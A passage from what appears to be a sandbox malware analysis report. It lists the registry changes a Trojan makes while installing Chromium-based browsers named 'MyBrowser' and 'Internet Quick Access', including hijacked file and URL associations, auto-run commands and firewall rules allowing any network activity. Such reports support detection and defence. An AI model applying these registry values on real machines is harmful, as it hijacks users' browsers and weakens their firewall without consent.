"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 1B B0 07 74 26 45 23 5E 66 36 DD DA 39 C6 F2"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"
[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"
[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"
The process setup.exe:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Chromium]
"pv" = "45.0.2433.0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ShowIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe --show-icons"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"sms" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Chromium]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"HideIconsCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe --hide-icons"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Chromium]
"InstallerExtraCode1" = "9"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"urn" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Chromium\Commands\on-os-upgrade]
"CommandLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe --on-os-upgrade --verbose-logging"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"news" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"NoModify" = "1"
[HKCU\Software\Chromium]
"InstallerSuccessLaunchCmdLine" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe"
[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}]
"(Default)" = "CommandExecuteImpl Class"
[HKCR\.xht\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"
[HKCR\.shtml\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Chromium]
"UninstallArguments" = " --uninstall"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"https" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".webp" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"irc" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Chromium]
"ap" = "-stage:refreshing_policy"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"ReinstallCommand" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe --make-default-browser"
[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}\LocalServer32]
"ServerExecutable" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\delegate_execute.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"InstallDate" = "20151029"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium,"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Internet Quick Access"
[HKCU\Software\Chromium]
"oopcrashes" = "1"
[HKCR\.xhtml\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mailto" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Chromium]
"Name" = "Internet Quick Access"
[HKCR\.htm\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Classes\CLSID\{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}\LocalServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\delegate_execute.exe"
[HKCR\ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe -- %1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"DisplayName" = "Internet Quick Access"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"
[HKCU\Software\Chromium\Commands\on-os-upgrade]
"AutoRunOnOSUpgrade" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"mms" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationDescription" = "Chromium is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into Chromium."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"InstallLocation" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3B 1C 04 FA C0 62 34 7C 54 3F CA CF 60 26 72 B7"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xht" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"ftp" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ]
"(Default)" = "Chromium HTML Document"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\45.0.2433.0\Installer\setup.exe --uninstall"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".html" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"webcal" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"Version" = "45.0.2433.0"
"Publisher" = "Internet Quick Access"
[HKCU\Software\Chromium]
"lang" = "en"
[HKLM\SOFTWARE\RegisteredApplications]
"Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = "Software\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"smsto" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCR\.html\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Chromium]
"InstallerError" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"VersionMajor" = "2433"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe]
"Path" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application"
[HKCU\Software\Chromium]
"FirstNotDefault" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\InstallInfo]
"IconsVisible" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"tel" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\Startmenu]
"StartMenuInternet" = "Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"http" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Chromium]
"InstallerResult" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"VersionMinor" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCR\.webp\OpenWithProgids]
"ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities]
"ApplicationName" = "Internet Quick Access"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"NoRepair" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".htm" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\URLAssociations]
"nntp" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\InternetQuickAccess]
"DisplayVersion" = "45.0.2433.0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".xhtml" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\shell\open\command]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ\DefaultIcon]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\Internet Quick Access.QQL2B5ZRL54V5ERAM5WD2OE6LQ\Capabilities\FileAssociations]
".shtml" = "ChromiumHTM.QQL2B5ZRL54V5ERAM5WD2OE6LQ"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application]
"Chrome.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\Chromium\Application\chrome.exe:*:Enabled:Internet Quick Access"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Chromium]
"InstallerExtraCode1"
"ap"
The process tmp24.tmp.exe:1492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 7E 05 B8 69 B4 3B 11 4E E1 3D 0C 9C 81 58 A1"
The process nsj1B.tmp:1648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 26 52 E5 0B 91 09 B9 33 24 8A 54 02 07 1A ED"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
The process dwwin.exe:2404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F CD 2D 88 D3 02 C8 3E DD 6B CB C2 00 61 D4 66"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
